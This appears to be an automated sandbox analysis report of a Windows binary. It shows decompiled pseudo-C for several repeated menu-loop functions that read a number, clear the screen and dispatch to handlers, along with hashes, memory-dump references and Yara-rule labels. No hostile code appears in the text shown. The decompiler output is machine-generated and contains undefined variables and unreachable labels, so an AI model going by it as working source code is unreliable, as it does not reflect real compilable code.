                                                        • Instruction ID: ab82bc8955a1f36080ffd7d19950cfbbe85d1a3f5f71a63cc0bdd727fcd4cee9
                                                        • Opcode Fuzzy Hash: 6ba4c53b99bd1424923b337d7a35827d28716ea2964ec8ac55e5570189f2edd8
                                                        • Instruction Fuzzy Hash: E771D770D042A9BACB6597A48E4DEFDBBB17F29306F4440E5EB6962142C5300B88EF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A52329, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00A52329(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t28;
				void* _t30;
				void* _t31;

				L0:
				while(1) {
					L0:
					_t33 = __eflags;
					_t27 = __esi;
					_t26 = __edi;
					_t25 = __edx;
					_t19 = __ebx;
					E00A51930(__ebx, __edx, __edi, __esi, __eflags);
					while(1) {
						L10:
						E00A5401F(_t19, _t25, _t26, _t33, "cls");
						_t31 = _t30 + 4;
						L1:
						if(1 != 0) {
							L2:
							_t25 = _t28 - 0x2210;
							E00A53A3A("%d", _t28 - 0x2210);
							_t30 = _t31 + 8;
							 *(_t28 - 0x2200) =  *(_t28 - 0x2210);
							 *(_t28 - 0x2200) =  *(_t28 - 0x2200) - 1;
							_t33 =  *(_t28 - 0x2200) - 5;
							if( *(_t28 - 0x2200) > 5) {
								L9:
								E00A6945E(_t19, _t25, _t26, _t27, __eflags);
							} else {
								L3:
								_t25 =  *(_t28 - 0x2200);
								switch( *((intOrPtr*)( *(_t28 - 0x2200) * 4 +  &M00A52364))) {
									case 0:
										L4:
										E00A511A0(_t19, _t25, _t26, _t27, _t33);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 1:
										L5:
										E00A51400(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 2:
										L6:
										E00A515D0(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 3:
										L7:
										E00A51BC0(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 4:
										goto L0;
									case 5:
										L8:
										E00A6945E(__ebx, __edx, __edi, __esi, __eflags);
										E00A53FE0(0);
										goto L9;
								}
							}
							L10:
							E00A5401F(_t19, _t25, _t26, _t33, "cls");
							_t31 = _t30 + 4;
							goto L1;
						}
						L11:
						__eflags =  *(_t28 - 4) ^ _t28;
						return E00A548DC(_t19,  *(_t28 - 4) ^ _t28, _t25, _t26, _t27);
						L12:
					}
				}
			}






                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00a522bb
                                                        0x00a522c2
                                                        0x00a522c8
                                                        0x00a522c8
                                                        0x00a522d4
                                                        0x00a522d9
                                                        0x00a522e2
                                                        0x00a522f1
                                                        0x00a522f7
                                                        0x00a522fe
                                                        0x00a5233c
                                                        0x00a5233c
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52306
                                                        0x00000000
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52322
                                                        0x00a52322
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52337
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52306
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00a52353
                                                        0x00a52358
                                                        0x00a52362
                                                        0x00000000
                                                        0x00a52362
                                                        0x00a52341

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction ID: 84961f0652e9e02adbca0b71f85ddfca154c243109889bb55b935938a1e25d21
                                                        • Opcode Fuzzy Hash: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction Fuzzy Hash: 34F0C230904114EAEB14B7E1DA4B77D36307F42353F1040D9EE1619143EA351B8D5BA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A52330, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00A52330(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t29;
				void* _t31;
				void* _t33;

				L0:
				while(1) {
					L0:
					_t28 = __esi;
					_t27 = __edi;
					_t20 = __ebx;
					E00A6945E(__ebx, _t26, __edi, __esi, __eflags);
					E00A53FE0(0);
					while(1) {
						L9:
						E00A6945E(_t20, _t26, _t27, _t28, __eflags);
						while(1) {
							L10:
							E00A5401F(_t20, _t26, _t27, _t36, "cls");
							_t31 = _t33 + 4;
							L1:
							if(1 != 0) {
								L2:
								_t26 = _t29 - 0x2210;
								E00A53A3A("%d", _t29 - 0x2210);
								_t33 = _t31 + 8;
								 *(_t29 - 0x2200) =  *(_t29 - 0x2210);
								 *(_t29 - 0x2200) =  *(_t29 - 0x2200) - 1;
								_t36 =  *(_t29 - 0x2200) - 5;
								if( *(_t29 - 0x2200) > 5) {
									L9:
									E00A6945E(_t20, _t26, _t27, _t28, __eflags);
								} else {
									L3:
									_t26 =  *(_t29 - 0x2200);
									switch( *((intOrPtr*)( *(_t29 - 0x2200) * 4 +  &M00A52364))) {
										case 0:
											L4:
											E00A511A0(_t20, _t26, _t27, _t28, _t36);
											goto L10;
										case 1:
											L5:
											E00A51400(__ebx, __edx, __edi, __esi, __eflags);
											while(1) {
												L10:
												E00A5401F(_t20, _t26, _t27, _t36, "cls");
												_t31 = _t33 + 4;
												goto L1;
											}
										case 2:
											L6:
											E00A515D0(__ebx, __edx, __edi, __esi, __eflags);
											while(1) {
												L10:
												E00A5401F(_t20, _t26, _t27, _t36, "cls");
												_t31 = _t33 + 4;
												goto L1;
											}
										case 3:
											L7:
											E00A51BC0(__ebx, __edx, __edi, __esi, __eflags);
											while(1) {
												L10:
												E00A5401F(_t20, _t26, _t27, _t36, "cls");
												_t31 = _t33 + 4;
												goto L1;
											}
										case 4:
											L8:
											E00A51930(__ebx, __edx, __edi, __esi, __eflags);
											while(1) {
												L10:
												E00A5401F(_t20, _t26, _t27, _t36, "cls");
												_t31 = _t33 + 4;
												goto L1;
											}
										case 5:
											goto L0;
									}
								}
								L10:
								E00A5401F(_t20, _t26, _t27, _t36, "cls");
								_t31 = _t33 + 4;
								goto L1;
							}
							L11:
							__eflags =  *(_t29 - 4) ^ _t29;
							return E00A548DC(_t20,  *(_t29 - 4) ^ _t29, _t26, _t27, _t28);
							L12:
						}
					}
				}
			}






                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52337
                                                        0x00a5233c
                                                        0x00a5233c
                                                        0x00a5233c
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00a522bb
                                                        0x00a522c2
                                                        0x00a522c8
                                                        0x00a522c8
                                                        0x00a522d4
                                                        0x00a522d9
                                                        0x00a522e2
                                                        0x00a522f1
                                                        0x00a522f7
                                                        0x00a522fe
                                                        0x00a5233c
                                                        0x00a5233c
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52306
                                                        0x00000000
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52322
                                                        0x00a52322
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52306
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00a52353
                                                        0x00a52358
                                                        0x00a52362
                                                        0x00000000
                                                        0x00a52362
                                                        0x00a52341
                                                        0x00a5233c

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction ID: 84961f0652e9e02adbca0b71f85ddfca154c243109889bb55b935938a1e25d21
                                                        • Opcode Fuzzy Hash: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction Fuzzy Hash: 34F0C230904114EAEB14B7E1DA4B77D36307F42353F1040D9EE1619143EA351B8D5BA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5230D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00A5230D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t28;
				void* _t30;
				void* _t31;

				L0:
				while(1) {
					L0:
					_t33 = __eflags;
					_t27 = __esi;
					_t26 = __edi;
					_t19 = __ebx;
					E00A511A0(__ebx, _t25, __edi, __esi, __eflags);
					while(1) {
						L10:
						E00A5401F(_t19, _t25, _t26, _t33, "cls");
						_t31 = _t30 + 4;
						L1:
						if(1 != 0) {
							L2:
							_t25 = _t28 - 0x2210;
							E00A53A3A("%d", _t28 - 0x2210);
							_t30 = _t31 + 8;
							 *(_t28 - 0x2200) =  *(_t28 - 0x2210);
							 *(_t28 - 0x2200) =  *(_t28 - 0x2200) - 1;
							_t33 =  *(_t28 - 0x2200) - 5;
							if( *(_t28 - 0x2200) > 5) {
								L9:
								E00A6945E(_t19, _t25, _t26, _t27, __eflags);
							} else {
								L3:
								_t25 =  *(_t28 - 0x2200);
								switch( *((intOrPtr*)( *(_t28 - 0x2200) * 4 +  &M00A52364))) {
									case 0:
										goto L0;
									case 1:
										L4:
										E00A51400(_t19, _t25, _t26, _t27, _t33);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 2:
										L5:
										E00A515D0(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 3:
										L6:
										E00A51BC0(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 4:
										L7:
										E00A51930(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 5:
										L8:
										E00A6945E(__ebx, __edx, __edi, __esi, __eflags);
										E00A53FE0(0);
										goto L9;
								}
							}
							L10:
							E00A5401F(_t19, _t25, _t26, _t33, "cls");
							_t31 = _t30 + 4;
							goto L1;
						}
						L11:
						__eflags =  *(_t28 - 4) ^ _t28;
						return E00A548DC(_t19,  *(_t28 - 4) ^ _t28, _t25, _t26, _t27);
						L12:
					}
				}
			}






                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00a522bb
                                                        0x00a522c2
                                                        0x00a522c8
                                                        0x00a522c8
                                                        0x00a522d4
                                                        0x00a522d9
                                                        0x00a522e2
                                                        0x00a522f1
                                                        0x00a522f7
                                                        0x00a522fe
                                                        0x00a5233c
                                                        0x00a5233c
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52306
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52322
                                                        0x00a52322
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52337
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52306
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00a52353
                                                        0x00a52358
                                                        0x00a52362
                                                        0x00000000
                                                        0x00a52362
                                                        0x00a52341

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction ID: 84961f0652e9e02adbca0b71f85ddfca154c243109889bb55b935938a1e25d21
                                                        • Opcode Fuzzy Hash: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction Fuzzy Hash: 34F0C230904114EAEB14B7E1DA4B77D36307F42353F1040D9EE1619143EA351B8D5BA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A52314, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00A52314(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t28;
				void* _t30;
				void* _t31;

				L0:
				while(1) {
					L0:
					_t33 = __eflags;
					_t27 = __esi;
					_t26 = __edi;
					_t25 = __edx;
					_t19 = __ebx;
					E00A51400(__ebx, __edx, __edi, __esi, __eflags);
					while(1) {
						L10:
						E00A5401F(_t19, _t25, _t26, _t33, "cls");
						_t31 = _t30 + 4;
						L1:
						if(1 != 0) {
							L2:
							_t25 = _t28 - 0x2210;
							E00A53A3A("%d", _t28 - 0x2210);
							_t30 = _t31 + 8;
							 *(_t28 - 0x2200) =  *(_t28 - 0x2210);
							 *(_t28 - 0x2200) =  *(_t28 - 0x2200) - 1;
							_t33 =  *(_t28 - 0x2200) - 5;
							if( *(_t28 - 0x2200) > 5) {
								L9:
								E00A6945E(_t19, _t25, _t26, _t27, __eflags);
							} else {
								L3:
								_t25 =  *(_t28 - 0x2200);
								switch( *((intOrPtr*)( *(_t28 - 0x2200) * 4 +  &M00A52364))) {
									case 0:
										L4:
										E00A511A0(_t19, _t25, _t26, _t27, _t33);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 1:
										goto L0;
									case 2:
										L5:
										E00A515D0(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 3:
										L6:
										E00A51BC0(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 4:
										L7:
										E00A51930(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 5:
										L8:
										E00A6945E(__ebx, __edx, __edi, __esi, __eflags);
										E00A53FE0(0);
										goto L9;
								}
							}
							L10:
							E00A5401F(_t19, _t25, _t26, _t33, "cls");
							_t31 = _t30 + 4;
							goto L1;
						}
						L11:
						__eflags =  *(_t28 - 4) ^ _t28;
						return E00A548DC(_t19,  *(_t28 - 4) ^ _t28, _t25, _t26, _t27);
						L12:
					}
				}
			}






                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00a522bb
                                                        0x00a522c2
                                                        0x00a522c8
                                                        0x00a522c8
                                                        0x00a522d4
                                                        0x00a522d9
                                                        0x00a522e2
                                                        0x00a522f1
                                                        0x00a522f7
                                                        0x00a522fe
                                                        0x00a5233c
                                                        0x00a5233c
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52306
                                                        0x00000000
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52322
                                                        0x00a52322
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52337
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52306
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00a52353
                                                        0x00a52358
                                                        0x00a52362
                                                        0x00000000
                                                        0x00a52362
                                                        0x00a52341

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction ID: 84961f0652e9e02adbca0b71f85ddfca154c243109889bb55b935938a1e25d21
                                                        • Opcode Fuzzy Hash: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction Fuzzy Hash: 34F0C230904114EAEB14B7E1DA4B77D36307F42353F1040D9EE1619143EA351B8D5BA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5231B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00A5231B(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t28;
				void* _t30;
				void* _t31;

				L0:
				while(1) {
					L0:
					_t33 = __eflags;
					_t27 = __esi;
					_t26 = __edi;
					_t25 = __edx;
					_t19 = __ebx;
					E00A515D0(__ebx, __edx, __edi, __esi, __eflags);
					while(1) {
						L10:
						E00A5401F(_t19, _t25, _t26, _t33, "cls");
						_t31 = _t30 + 4;
						L1:
						if(1 != 0) {
							L2:
							_t25 = _t28 - 0x2210;
							E00A53A3A("%d", _t28 - 0x2210);
							_t30 = _t31 + 8;
							 *(_t28 - 0x2200) =  *(_t28 - 0x2210);
							 *(_t28 - 0x2200) =  *(_t28 - 0x2200) - 1;
							_t33 =  *(_t28 - 0x2200) - 5;
							if( *(_t28 - 0x2200) > 5) {
								L9:
								E00A6945E(_t19, _t25, _t26, _t27, __eflags);
							} else {
								L3:
								_t25 =  *(_t28 - 0x2200);
								switch( *((intOrPtr*)( *(_t28 - 0x2200) * 4 +  &M00A52364))) {
									case 0:
										L4:
										E00A511A0(_t19, _t25, _t26, _t27, _t33);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 1:
										L5:
										E00A51400(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 2:
										goto L0;
									case 3:
										L6:
										E00A51BC0(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 4:
										L7:
										E00A51930(__ebx, __edx, __edi, __esi, __eflags);
										while(1) {
											L10:
											E00A5401F(_t19, _t25, _t26, _t33, "cls");
											_t31 = _t30 + 4;
											goto L1;
										}
									case 5:
										L8:
										E00A6945E(__ebx, __edx, __edi, __esi, __eflags);
										E00A53FE0(0);
										goto L9;
								}
							}
							L10:
							E00A5401F(_t19, _t25, _t26, _t33, "cls");
							_t31 = _t30 + 4;
							goto L1;
						}
						L11:
						__eflags =  *(_t28 - 4) ^ _t28;
						return E00A548DC(_t19,  *(_t28 - 4) ^ _t28, _t25, _t26, _t27);
						L12:
					}
				}
			}






                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a5231b
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00a522bb
                                                        0x00a522c2
                                                        0x00a522c8
                                                        0x00a522c8
                                                        0x00a522d4
                                                        0x00a522d9
                                                        0x00a522e2
                                                        0x00a522f1
                                                        0x00a522f7
                                                        0x00a522fe
                                                        0x00a5233c
                                                        0x00a5233c
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52306
                                                        0x00000000
                                                        0x00a5230d
                                                        0x00a5230d
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52314
                                                        0x00a52314
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52322
                                                        0x00a52322
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52329
                                                        0x00a52329
                                                        0x00a52341
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00000000
                                                        0x00a52330
                                                        0x00a52330
                                                        0x00a52337
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52306
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00000000
                                                        0x00a5234e
                                                        0x00a52353
                                                        0x00a52358
                                                        0x00a52362
                                                        0x00000000
                                                        0x00a52362
                                                        0x00a52341

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction ID: 84961f0652e9e02adbca0b71f85ddfca154c243109889bb55b935938a1e25d21
                                                        • Opcode Fuzzy Hash: c0afdfbecf2b1ccef0852148e75b4453fc3970471787e0f005ff033c713a5fbf
                                                        • Instruction Fuzzy Hash: 34F0C230904114EAEB14B7E1DA4B77D36307F42353F1040D9EE1619143EA351B8D5BA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00A54BE6, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A54BE6(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                        0x00a54beb
                                                        0x00a54bfb

                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A550EB,?,?,?,00000000), ref: 00A54BEB
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00A54BF4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: e59a0f7e2746e00392759a453ba3ed13abf49c56b5b57b7beb96410e1a4dbc84
                                                        • Instruction ID: eeb0c1fe4fb051f901b1e836a065907e291d5c14d97540a29416ecbae1232389
                                                        • Opcode Fuzzy Hash: e59a0f7e2746e00392759a453ba3ed13abf49c56b5b57b7beb96410e1a4dbc84
